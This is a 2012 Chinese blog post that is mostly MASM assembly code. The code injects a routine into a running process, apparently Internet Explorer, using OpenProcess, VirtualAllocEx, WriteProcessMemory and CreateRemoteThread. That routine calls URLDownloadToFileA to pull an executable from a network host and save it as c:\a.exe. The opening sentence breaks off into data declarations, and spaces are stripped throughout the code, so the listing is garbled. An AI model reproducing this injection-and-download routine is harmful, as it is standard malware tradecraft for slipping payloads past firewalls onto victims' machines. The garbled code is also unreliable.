注入下载文件的代码到IE进程然后执行下载的文件

大家可能都用过网页szBufferdd20dup(0),0 piddd0 hProcessdd0 hThreaddd0 pCodeRemotedd0 path1db'c:\a.EXE',0 .const szmsgdb'URLDownloadToFileA',0 userdlldb'Urlmon.dll',0 ;szmsgdb'MessageBoxA',0 ;userdlldb'User32.dll',0 szloadlibdb'LoadLibraryA',0;注意和LoadLibraryW的区别哟 kerdlldb'kernel32.dll',0 .code codebegin: dispdatadb"http://192.168.0.5/NBTreeList.exe",0 szTitdb"c:\a.exe",0 datalen=$-codebegin Rprocprocmsgbox;MessageBoxA的地址为参数 CALL@F;pushesi @@: POPEBX SUBEBX,OFFSET@B LEAECX,[EBX+dispdata] LEAEDX,[EBX+szTit] pushNULL push0 pushedx pushecx pushNULL callmsgbox ret;重要 Rprocendp codelen=$-codebegin;代码长度xx字节 start: ;invokeFindWindow,0,offsettit;返回计算器窗口句柄 invokeFindWindow,offsettit,0 invokeGetWindowThreadProcessId,eax,offsetpid;计算机器程序的进程PID号 ;invokewsprintf,offsetszBuffer,offsetszFormat,pid;把PID用十进制显示 invokeOpenProcess,PROCESS_ALL_ACCESS,FALSE,pid;打开进程,得到进程句柄 movhProcess,eax;保存进程句柄 invokeVirtualAllocEx,hProcess,0,codelen,MEM_COMMIT,PAGE_EXECUTE_READWRITE movpCodeRemote,eax invokeWriteProcessMemory,hProcess,pCodeRemote,offsetcodebegin,codelen,NULL movesi,pCodeRemote addesi,datalen pushesi invokeLoadLibrary,offsetuserdll invokeGetProcAddress,eax,offsetszmsg popesi invokeCreateRemoteThread,hProcess,0,0,esi,eax,0,0 movhThread,eax;返回线程句柄 .ifhThread invokeWaitForSingleObject,hThread,INFINITE;等待线程结束 invokeCloseHandle,hThread;关闭线程句柄 .endif invokeVirtualFreeEx,hProcess,pCodeRemote,codelen,MEM_RELEASE;释放
posted @ 2012-07-15 22:39  adodo1  Views(86)  Comments(0Edit  收藏  举报